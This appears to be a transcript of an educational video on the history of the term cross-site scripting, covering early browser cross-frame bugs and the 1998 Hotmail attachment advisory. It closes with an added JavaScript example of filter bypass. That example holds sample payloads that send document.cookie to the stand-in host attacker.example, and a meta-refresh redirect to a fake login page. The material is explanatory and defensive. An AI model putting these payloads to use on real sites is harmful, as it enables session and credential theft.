The Origin of Cross-Site Scripting (XSS) - Hacker Etymology
Cross-site Scripting is the name for a well-known type of security issue that can affect websites.
And I always thought the name XSS is terrible.
I think it's confusing a lot of beginners. Well,
at least it confused me back when I started.
Instead, I think JavaScript code injection, or the more general HTML injection, makes a lot more sense.
So I always wondered: why do we have this weird name, cross-site scripting?
At some point, somebody had to invent this name, and somebody had to discover this type of vulnerability in the first place. Another motivation for this video is that, of course, having names for things like XSS is very important when we communicate with each other, but naming things can also cause compartmentalization: mind cuffs, blinders. And hacking in its essence is extremely creative, and you should always think outside the box. So in my opinion, it's important to understand the history of any kind of vulnerability, because it.
When you want to know something about history, you always go check what Wikipedia says, and on the cross-site scripting page we can read: "Microsoft security engineers introduced the term cross-site scripting in January 2000." But the source listed for that is a Microsoft blog post from 2009 celebrating ten years of cross-site scripting.
While this is not the original release, in this blog post David Ross shares some of the names that were suggested: Unauthorized Site Scripting, URL Parameter Script Insertion, or Cross-Site Scripting. Cool, but it doesn't help much.
I still don't understand why they thought of these names.
Why not HTML or JavaScript injection or insertion?
Though URL Parameter Script Insertion is pretty close.
Besides those name ideas, David also mentioned that they coordinated an advisory release with CERT in the year 2000.
So Microsoft worked together on this with the national Computer Emergency Response Team.
What was this emergency?
Also, why was Microsoft the one to talk about it?
I want to better understand what happened in 1999 and 2000, and luckily I was able to talk to David Ross, the author of this article.
So I was wondering: back in '99 and 2000, how novel was this kind of attack?
Were XSS issues already known, or was it something the team at Microsoft discovered?
And he responded saying: "I was doing work related to Georgi Guninski's bugs, which we termed 'cross-domain' bugs."
Recognize this name? If you have seen the previous videos on this topic, you will know Georgi.
Yeah, initially my plan was to just make a single video about the origin of the name Xss
but when I started researching deeper thanks to David Ross I realized history is a lot richer
and to understand how we got to the term cross-site scripting, we had to understand the events that happened before it.
So if you haven't seen the previous videos, go check them out.
The playlist is linked below, but to briefly summarize:
Browsers had a lot of interesting security bugs at the time related to JavaScript, and we have looked at several of these original vulnerabilities in action.
One of them was, for example, this issue Georgi found in Internet Explorer. It was disclosed in January 2000, just nine days before the world would get introduced to cross-site scripting.
Now this particular browser issue was referred to as a "cross frame policy security issue", and that name makes total sense.
These vulnerabilities back then were always breaking the browser security boundary between two websites.
Of course, these vulnerabilities all work differently,
but in the end, it's always one website that either embeds another site via iframes or opens another site via window.open,
and by somehow exploiting a bug in the browser, it can access data from the other website, like the cookies or so.
So we have an issue related to crossing over into another browser frame: a cross frame policy security issue.
But these were browser issues.
XSS is a vulnerability in websites themselves, and as we now know, in parallel to this kind of browser security research from Georgi and others, a new field of exploitation was slowly boiling up.
And of course, Microsoft didn't invent cross-site scripting attacks themselves.
It was already getting exploited in practice.
So have a look at this vulnerability disclosure from August 1998.
Hotmail attachments. They have a logo! To all these people complaining about vulnerability names, logos, and websites: 1998, there you have it. It is not a new trend, it always happened.
And I'm glad that this website exists, because it's really hard to find information about the original XSS attacks. But thanks to a website like this, a lot of history is preserved.
So let's read a few paragraphs of this. "This page describes a security problem that Blue Adept discovered with Microsoft's Hotmail service on August 28, 1998." As you probably know, Hotmail is Microsoft's webmail service.
So, email in the browser. "Users clicking on mail attachments in Hotmail are vulnerable to having their passwords stolen by malicious users."
Further down, they explain how you can send a Hotmail attachment yourself. They have this mailmes.html document, which you can send yourself as an attachment, and when opening it in Hotmail, a payload triggers.
Now, the payload in this example is actually a Macromedia Shockwave plugin. But look at this comparison: which free mail services are safe? So Microsoft Hotmail is vulnerable to Java applets, and a few other services as well.
But look there: they also list which services are vulnerable to injecting script tags, hidden script tags, and meta tags. I'm not 100% sure what the difference here is, but clearly this is a classic case of cross-site scripting.
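The three injection categories that the 1998 comparison table lists, shown as an added JavaScript example that is not from the video, from the Blue Adept page, or from mailmes.html. The sample attachment bodies and the host attacker.example are constructed for the example. "Hidden script tags" is taken here, as an assumption the 1998 page does not spell out, to mean script tags obscured from a naive filter by mixed case or stray whitespace inside the tag; the meta vector is a `<meta http-equiv="refresh">` redirect to an attacker-controlled login page, which needs no script at all. The point the example makes is that a blocklist for the literal string `<script>` stops only the first category.

```javascript
// Added example (not from the video or the 1998 Hotmail advisory).
// Three HTML-attachment payload shapes, one per category in the 1998
// comparison table, and a naive blocklist that catches only the first.
// Assumption: "hidden script tags" = script tags a simple filter misses
// (mixed case, whitespace inside the tag). attacker.example is fictional.

// Constructed sample attachment bodies, as a webmail service would render
// them inside its own origin.
const SAMPLES = {
  plainScript:
    '<html><body><script>document.location="http://attacker.example/?c="+document.cookie</script></body></html>',
  hiddenScript:
    '<html><body><SCRIPT\n>document.location="http://attacker.example/?c="+document.cookie</SCRIPT></body></html>',
  metaRefresh:
    '<html><head><meta http-equiv="refresh" content="0;url=http://attacker.example/login"></head></html>',
  benign: '<html><body><p>Meeting notes attached.</p></body></html>',
};

// A naive filter of the kind a 1998 webmail service might have used:
// it strips only the literal lowercase "<script>" opening tag.
function naiveFilter(html) {
  return html.split('<script>').join('');
}

// Tolerant tag tokenizer: lowercases the tag name and collapses whitespace
// in the attribute list so "<SCRIPT\n>" and "<script>" look alike.
function tokenizeTags(html) {
  const tags = [];
  const re = /<\s*(\/?)\s*([a-zA-Z][a-zA-Z0-9-]*)([^>]*)>/g;
  let m;
  while ((m = re.exec(html)) !== null) {
    tags.push({
      raw: m[0],
      closing: m[1] === '/',
      name: m[2].toLowerCase(),
      attrs: m[3].toLowerCase().replace(/\s+/g, ' ').trim(),
    });
  }
  return tags;
}

// Classifies which of the three injection vectors an attachment carries.
// Returns a sorted array of vector names (empty for a harmless attachment).
function findInjectionVectors(html) {
  const found = new Set();
  for (const tag of tokenizeTags(html)) {
    if (tag.closing) continue;
    if (tag.name === 'script') {
      // Exactly "<script>" is what the naive filter knows about; any other
      // spelling that still tokenizes as a script tag is "hidden" from it.
      found.add(tag.raw === '<script>' ? 'script' : 'hidden-script');
    }
    if (tag.name === 'meta' && /http-equiv\s*=\s*"?refresh/.test(tag.attrs)) {
      found.add('meta-refresh');
    }
  }
  return [...found].sort();
}

// True when the naive filter leaves an executable or redirecting tag behind.
function naiveFilterBypassed(html) {
  return findInjectionVectors(naiveFilter(html)).length > 0;
}

for (const [name, html] of Object.entries(SAMPLES)) {
  console.log(name, findInjectionVectors(html), 'bypasses naive filter:', naiveFilterBypassed(html));
}
```

Running it prints that `plainScript` is the only payload the naive filter neutralizes; the mixed-case script tag and the meta refresh both survive, which is the practical reason filtering on tag names was never a sufficient defense and output encoding took its place.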